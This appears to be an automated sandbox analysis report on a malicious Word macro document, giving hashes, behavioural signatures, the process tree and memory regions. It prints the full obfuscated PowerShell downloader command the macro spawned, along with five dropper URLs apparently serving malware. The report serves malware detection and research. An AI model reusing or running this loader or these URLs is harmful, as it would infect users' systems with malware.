Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 00:28

General

  • Target

    621f61036b3455c2f208244d427a0a1aJaffaCakes118.doc

  • Size

    259KB

  • MD5

    621f61036b3455c2f208244d427a0a1a

  • SHA1

    97a90cfcc9f8d1a268ae29c0fac7247798f68558

  • SHA256

    e48d84f3821901ac175931583751b6dc89592aaf1ea9896d95adb131652bedcc

  • SHA512

    27bd362a6938380823efd3c5608fe4d7be553fc363b7a367a428a0c96ec65c050c488cb419ee3d3a17429004be52b0eefdad5c306f3e8a683dbd8f50267c0c2b

  • SSDEEP

    3072:8H9nBf4SuEjAhmAMOc7kkkko1rkGuF3tBInxGGq5nyXJm9YBmjDM2lNdsiGCT:8FVeEsjdXRC3jexGG6MYWof5dsiGCT

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.gurutransfer.com/cGQPt/

exe.dropper

http://www.prava-traktorista.ru/Pny/

exe.dropper

http://www.noobingame.tk/rP2E/

exe.dropper

http://www.frigolutasima.net/m/

exe.dropper

http://www.batikcar.com/GDW/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\621f61036b3455c2f208244d427a0a1aJaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2068
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell & ( $sHellid[1]+$SHeLLId[13]+'x') (New-objECT SYsTEm.iO.STreaMrEADEr((New-objECT iO.COMPRessIon.deFLaTesTREAM( [io.MEMORyStREaM] [COnveRt]::FRoMBAsE64StrInG( 'VZBNa8JAEIb/Sg4Lq1h3S6FQXAJCbbUHS4pQL71MthOz+dgNk4mpFf97o17qdZ6Hl/cdsX5zscd+GtICLUfvyGqL6XPl0LMR2Wcey5y5mWnd973addQxgW8zJGVDre3yI2E9/6c0BHuYDlLJgVzLoKjTiT/cSD6E1Pkd1Ki41JQ8vNzgjNwuVB1D62pQHlnXNzwFdqWFa4XlYqul2jSV45Gcy7ER6xVFcSSfHu+lEaviNxbo9zPGupnILzk584lU+IPSZIEQbD4ShdtEzkfnxeMj0+Eohs+oReh9FeD71VV4ce6ic+DYbBiIpwkFi217uZl0SCrNyQLb/Hg6/QE='), [sYSTEM.iO.CoMprESSiON.ComPResSIoNMoDe]::DeCoMPresS)) ,[TeXT.EncODing]::aSCIi) ).reADToeND()
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1104
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2784

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      382b80ee9975472a416801f5cac23a8e

      SHA1

      92580543a2c3422df8e7c63f68a3da446a9d05d1

      SHA256

      a7d1fcaded74458b2d7fe4a21974bfad03564a0031aa42fa99b3226a261a3501

      SHA512

      075f73e59efaecccca1dc9b757d2291622fcadee14f42e7500d4bd65f55c3bdd9b432c471862c405c7f845f9068d5698ee353c75cc8d870abdc6d1b11afc9f6f

    • memory/2068-12-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-15-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-7-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-17-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-29-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-9-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-8-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-11-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-10-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-0-0x000000002F591000-0x000000002F592000-memory.dmp
      Filesize

      4KB

    • memory/2068-5-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-2-0x0000000070DDD000-0x0000000070DE8000-memory.dmp
      Filesize

      44KB

    • memory/2068-6-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-31-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-30-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-25-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-40-0x0000000070DDD000-0x0000000070DE8000-memory.dmp
      Filesize

      44KB

    • memory/2068-41-0x00000000004B0000-0x00000000005B0000-memory.dmp
      Filesize

      1024KB

    • memory/2068-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2068-59-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2068-60-0x0000000070DDD000-0x0000000070DE8000-memory.dmp
      Filesize

      44KB